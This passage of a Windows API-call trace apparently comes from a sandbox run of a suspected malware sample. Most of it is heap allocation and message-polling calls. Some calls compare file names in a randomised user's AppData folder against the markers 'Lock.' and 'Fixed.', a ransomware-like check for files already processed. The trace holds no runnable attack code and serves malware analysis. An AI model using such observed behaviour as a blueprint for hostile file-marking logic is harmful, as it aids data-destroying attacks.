HALPmcxz\\AppData\\Roaming\\qtQYu5s9c3vFJHOzQ.csv", lpFilePart=0x8bf658*="qtQYu5s9c3vFJHOzQ.csv") returned 0x43 [0206.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0206.566] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qtQYu5s9c3vFJHOzQ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qtqyu5s9c3vfjhozq.csv")) returned 0xffffffff [0206.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.567] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0206.567] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.567] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0206.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0206.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0206.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0206.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0206.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UEbu8HvUsrKZg-ZGj.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ebu8HvUsrKZg-ZGj.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bu8HvUsrKZg-ZGj.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u8HvUsrKZg-ZGj.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8HvUsrKZg-ZGj.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HvUsrKZg-ZGj.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vUsrKZg-ZGj.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UsrKZg-ZGj.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="srKZg-ZGj.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rKZg-ZGj.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KZg-ZGj.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zg-ZGj.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g-ZGj.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-ZGj.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZGj.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gj.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.569] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0206.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0206.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UEbu8HvUsrKZg-ZGj.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ebu8HvUsrKZg-ZGj.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bu8HvUsrKZg-ZGj.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u8HvUsrKZg-ZGj.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8HvUsrKZg-ZGj.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HvUsrKZg-ZGj.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vUsrKZg-ZGj.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UsrKZg-ZGj.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="srKZg-ZGj.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rKZg-ZGj.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KZg-ZGj.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zg-ZGj.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g-ZGj.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-ZGj.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZGj.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gj.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.570] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0206.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0206.570] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0206.570] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0206.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.570] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0206.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.571] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0206.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0206.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.571] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0206.571] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.571] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0206.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.571] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0206.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.571] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.572] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.572] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/UEbu8HvUsrKZg-ZGj.m4a", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d360f20, ftCreationTime.dwHighDateTime=0x1d4cffa, ftLastAccessTime.dwLowDateTime=0x3a8e6870, ftLastAccessTime.dwHighDateTime=0x1d4c766, ftLastWriteTime.dwLowDateTime=0x3a8e6870, ftLastWriteTime.dwHighDateTime=0x1d4c766, nFileSizeHigh=0x0, nFileSizeLow=0xf2fd, dwReserved0=0xa730039, dwReserved1=0x19fef, cFileName="UEbu8HvUsrKZg-ZGj.m4a", cAlternateFileName="UEBU8H~1.M4A")) returned 0xaa5760 [0206.572] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0206.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.573] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0206.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0206.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.574] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.574] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0206.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0206.575] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0206.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.575] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.576] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.576] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.576] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0206.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.576] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0206.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.577] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.577] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.577] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 